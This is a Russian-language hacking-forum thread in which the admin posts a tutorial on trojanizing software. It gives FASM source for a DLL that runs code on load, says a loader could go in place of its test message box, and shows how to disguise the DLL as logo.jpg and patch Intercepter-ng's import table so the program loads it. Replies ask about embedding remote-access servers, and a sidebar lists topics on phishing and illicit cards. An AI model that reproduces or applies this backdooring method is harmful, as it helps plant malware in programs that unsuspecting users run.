Admin

Администратор
Сегодня я покажу вам, как троянить файлы правильно.
Использовать для этого мы будем FASM, CFF Explorer и жопо-файл jpg-файл
Итак, для начала нам надо сделать dll'ку, которую потом переименуем в jpg

Код:
format PE GUI 4.0 DLL

include 'win32ax.inc'
include 'macro\if.inc'
section '.text' code readable executable

proc start hinstDLL:DWORD,fdwReason:DWORD,lpvReserved:DWORD

 mov   eax, TRUE

 .if ([fdwReason] = DLL_PROCESS_ATTACH)
     invoke    MessageBoxA, 0, 'Injected', 'Inj', 0
 .endif

 ret
endp
.end start

proc Malware

   ret;Do nothing
endp

section '.edata' export data readable
 export 'MyImage',\
   Malware,'Malware'
section '.reloc' fixups data discardable
Тут все просто, есть некоторая заглушка в виде функции на экспорте Malware и точка входа

Код:
proc start hinstDLL:DWORD,fdwReason:DWORD,lpvReserved:DWORD

 mov   eax, TRUE

 .if ([fdwReason] = DLL_PROCESS_ATTACH)
     invoke    MessageBoxA, 0, 'Injected', 'Inj', 0
 .endif

 ret
endp
на точке входа просто выводим мессаджбокс "injected". Но сюда ничто не мешает нам добавить лоадер нерезидентный.

Итак. Компилируем все это дело, получаем некоторый *.dll. Переименуем-ка ее в logo.jpg и кинем в папку с софтом.
97cvjm7221111

Отлично, теперь мы должны заставить нашу logo.jpg запускаться как dll в контексте Intercepter-ng. Для этого открываем его в CFF Explorer'е и переходим во вкладку Import Adder.
Жмем Add ( он будет выделен синеньким ) и выбираем Logo.jpg, далее выбираем нашу заглушку Malware и жмем Import By Name, попутно снимая галочку с Rebuild with OFTs

В итоге увидим такое:
WNcZFk222222222222

Жмем Rebuild Import Table, закрываем CFF Explorer. Он спросит сохранить - жмем да, он спросит перезаписать - жмем да.
Отлично, теперь врубим наш intercepter-ng
WoSZXHI333333333333333

И видим, что наша длл успешно заинжектилась в процесс. Отлично
 
J

JackDaniels

а как exe сервер кометы к примеру запихать?
 
E

ERMAG

в intercepter-ng есть интересная штучка с exe или другое что то делаешь ожидание человек скачивает не важно хоть ав с офф сайта но скачивается именно твой файл сам лично тестил.
 
E

ergood

на сколько актуальная тема в данный момент ? и ещё вроде как работает этот снифер intercepter-ng в локалке будет ли это работать за натом ?
 
Похожие темы
Admin Статья Как правильно изучать malware-кодинг под Windows Вирусология 0
Admin Интересно Как стать «богом» в Linux, просто правильно подгадав время. Спойлер: вам понадобится Chronomaly. Новости в сети 0
Admin Интересно Как правильно шифровать диски VeraCrypt'ом Анонимность и приватность 2
ev0117434 Интересно Как правильно заказывать рекламу в телеграмме! Спам, рассылки, трафик, SEO 0
S Как правильно использовать фишинговые рассылки в рамках пентеста (СТАТЬЯ НЕ МОЯ) Полезные статьи 5
K Росскажите поподробнее о терминах и как это правильно применять. Свободное общение 3
S Как правильно чистить дедик ? Полезные статьи 1
M Как правильно пробить человека через интернет Ч1 Полезные статьи 0
K Как правильно пользоваться левыми дебетовыми картами Полезные статьи 0
АнАлЬнАя ЧуПаКаБрА Как правильно восстановить спамблок-почту Mail.Ru (90% успех) Раздачи и сливы 1
Admin Интересно Историки опровергли роль Томаса Эдисона как отца звукозаписи. Новости в сети 0
Admin Интересно Приёмник смотрит вправо, а удар прилетел слева. Как физика из школьного двора ломает радиозащиту. Новости в сети 0
Admin Интересно Узнайте, как злоумышленники видят вашу сеть: вебинар с HD Moore. Новости в сети 0
Admin Интересно Скидки-оборотни: как бонусные баллы превращаются в инструмент мошенничества. Новости в сети 0
Admin Интересно Искусственный интеллект сокращает временные рамки эксплуатации уязвимостей. Как с этим справиться?. Новости в сети 0
Admin Интересно Тест-драйв: как избавиться от сомнений в выборе ИБ-решения за 7 дней. Новости в сети 0
Admin Интересно Как управлять скрытыми ИИ-инструментами без замедления работы сотрудников. Новости в сети 0
Admin Интересно Ошибка из 2018 и подставные аккаунты. Рассказываем, как популярный пакет art-template начал атаковать айфоны. Новости в сети 0
Admin Интересно Сотрудник ушёл, а доступ остался. Как забытая учётка открыла хакерам путь к водоснабжению целого города. Новости в сети 0
Admin Интересно Роботы научились двигаться как живая материя. Новости в сети 0
Admin Интересно Идентификация как основной вектор атак в современных системах безопасности. Новости в сети 0
Admin Интересно Студенты возмущены после того, как ИИ пропустил сотни имён на выпускной церемонии. Новости в сети 0
Admin Интересно Как небольшая группа пользователей может ухудшить рекомендации в TikTok. Новости в сети 0
Admin Интересно Как небольшая группа пользователей может испортить рекомендации на TikTok. Новости в сети 0
Admin Интересно Как снизить риск фишинга до того, как он приведёт к сбоям в бизнесе. Новости в сети 0
Admin Интересно Как автоматизация ИБ закрывает угрозы без рутины. Новости в сети 0
Admin Интересно VPN, просевший трафик и минус 7 млрд руб. Как новые требования Минцифры ударили по маркетплейсам. Новости в сети 0
Admin Интересно Как анализ собственных инструментов помогает снизить риски кибератак. Новости в сети 0
Admin Интересно Практический вебинар: Как PT NGFW защищает от атак в реальном времени. Новости в сети 0
Admin Интересно ИИ уходит на дно: плавучие серверы в океане как новый этап развития технологий. Новости в сети 0
Admin Интересно Мы искали инопланетян не там? Жизнь прячется не в молекулах, а в том, как они организованы. Новости в сети 0
Admin Интересно Как спрятать секрет с помощью недоказуемой математики? Учёный обошёл 30-летний запрет в криптографии. Новости в сети 0
Admin Интересно Anthropic рассказала, как отучила искусственный интеллект угрожать людям. Новости в сети 0
Admin Интересно Безопасность КИИ: что изменилось и как выстроить защиту. Новости в сети 0
Admin Интересно Звездные каннибалы и космические ДТП. Как во Вселенной появляются самые тяжелые черные дыры. Новости в сети 0
Admin Интересно Азбука Морзе, Grok и $200 000: как один пост в X заставил ИИ-агента перевести токены. Новости в сети 0
Admin Интересно ФБР также читает чаты. Как переписка в мессенджере стоила хакеру восьми лет свободы. Новости в сети 0
Admin Интересно Защита или цензура? История о том, как Касперский стал личным Роскомнадзором на MacBook. Новости в сети 0
Admin Интересно Первый удар по VPN в США: как Юта хочет запретить анонимность, не имея на это технических средств. Новости в сети 0
Admin Интересно Исследователь показал, как отследить австралийских полицейских через Bluetooth. Новости в сети 0
Admin Интересно Галактике 400 миллионов лет, но она выглядит на миллиарды. Уэбб нашёл невозможного красного монстра — и астрономы не понимают, как он успел повзрослет Новости в сети 0
Admin Интересно Целились в Starlink — попали в iPhone. Как новый запрет на спутниковое оборудование создал правовую неопределённость для всего рынка смартфонов. Новости в сети 0
Admin Интересно СМС, которую вы никогда не прочитаете. Как спецслужбы находят «важных персон» за пару часов. Новости в сети 0
Admin Интересно Скафандры не готовы, Луна ждёт. Как бюрократия срывает планы NASA вернуться на Луну. Новости в сети 0
Admin Интересно ИИ врёт так же, как раньше. Но теперь он делает это мило — и вы ему доверяете. Новости в сети 0
Admin Интересно Азартные игры, долги и переписка двух гениев. Как ссора из-за 100 долларов создала современную математику. Новости в сети 0
Admin Интересно Приключения казаха в южнокорейских сетях. Как жадность довела взломщика до тюрьмы. Новости в сети 0
Admin Интересно Что скрыто за вымогательством: как работает индустрия ransomware. Новости в сети 0
Admin Интересно Режиссёры защищают использование ИИ для воссоздания Вэла Килмера в новом фильме как «этичное». Новости в сети 0
Admin Интересно Частица, которая спасла бы физику. Стерильное нейтрино искали 30 лет — как жаль, что оно оказалось миражом. Новости в сети 0

Название темы